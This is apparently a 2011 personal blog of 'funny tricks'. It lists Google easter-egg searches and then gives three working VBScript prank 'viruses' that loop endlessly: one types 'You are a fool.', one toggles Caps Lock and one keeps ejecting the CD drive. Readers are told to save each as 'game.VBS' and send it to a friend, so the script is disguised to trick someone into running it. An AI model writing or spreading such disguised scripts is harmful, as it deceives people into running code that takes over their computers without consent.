Tuesday, 11 October 2011

Funny tricks for google no 3


If you want to see how the google homepage will look if it gets hacked


1-go to google.com
2-type in search google hacker
3-and click on I’am feeling lucky

funny tricks for google no 4


Change background image in google


1-go to google.com        
2-click on the change background image
3-login with gmail username and password
4-uplode image

Funny trick for google no 2


1-go to google.com
2-type in search epic google
3-and click on I’am feeling lucky

In the epic google font size of google increasing
Automatically

Funny trick for google no 1


1-go to google.com
2-type in search google gravity
3-and click on I’am feeling lucky
Now you see the effect of gravity on google

Saturday, 24 September 2011

Notepad trick 3


Open notpad and then
type


Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{CAPSLOCK}"
loop


Then save as “game.VBS” and send to your friend
And see

This is harmless notepad virus
It toggle your friend’s caps lock button simultaneously.

Notepad trick 2


Open notepad  and then
 type



Set oWMP = CreateObject("WMPlayer.OCX.7")
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 5000
loop



Then save as “game.VBS” and send to your friend
And see

This is harmless notepad virus
It continually pop out your friend’s cd or dvd drive.

Friday, 23 September 2011

Notepad trick 1

Make harmless notepad virus

open notepad

then type this



Set wshShell = wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "You are a fool."
loop



and save as game.VBS and done.
then  send this file to your friend and see


this is the harmless you are fool virus


for turn off the virus restart computer.